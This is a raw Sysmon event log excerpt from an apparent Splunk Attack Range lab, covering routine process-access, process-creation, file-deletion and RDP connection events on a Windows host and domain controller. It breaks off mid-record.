09:08:27.066{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978126Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:27.066{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978125Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:27.066{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978124Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:27.066{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978123Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:27.066{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978122Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:27.066{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978121Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:27.066{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978120Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:27.066{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978119Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:27.066{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978118Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:27.066{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-8A0B-6151-AD79-00000000FD01}1312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000978117Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:27.066{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8A0B-6151-AD79-00000000FD01}1312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000978116Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:27.051{69CF5F33-8A0B-6151-AD79-00000000FD01}1312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049474Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:27.160{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\surveyor-20210924073320-4305MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978160Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:28.863{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B77A7696C69C3CBB556BF511D69CFCB9,SHA256=ABF42D1C5323D03F87E22A086046BA6B8426802725739996AD30F882AA7223E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978159Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:28.816{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BA46CBB4515D4D3EC53D61FE6783666D,SHA256=E8035FB9469EA7D82532B3D81C984287C779FEBE85EFD17E3BAAB8667C5B7CE2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049477Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:27.449{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse13.235.255.213ec2-13-235-255-213.ap-south-1.compute.amazonaws.com51425-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001049476Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:28.411{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43696D896AC0133F4AA4AAE2F8BA3356,SHA256=ED56FFA4A5354FDF89C9BC2EC29A831857940099F09EE2D66C15701388B0404A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000978158Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:28.394{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978157Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:28.394{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978156Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:28.394{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8A0C-6151-AF79-00000000FD01}3884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978155Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:28.394{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978154Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:28.394{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978153Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:28.394{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978152Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:28.394{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978151Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:28.394{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978150Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:28.394{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8A0C-6151-AF79-00000000FD01}3884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000978149Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:28.394{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978148Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:28.394{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978147Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:28.394{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8A0C-6151-AF79-00000000FD01}3884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program 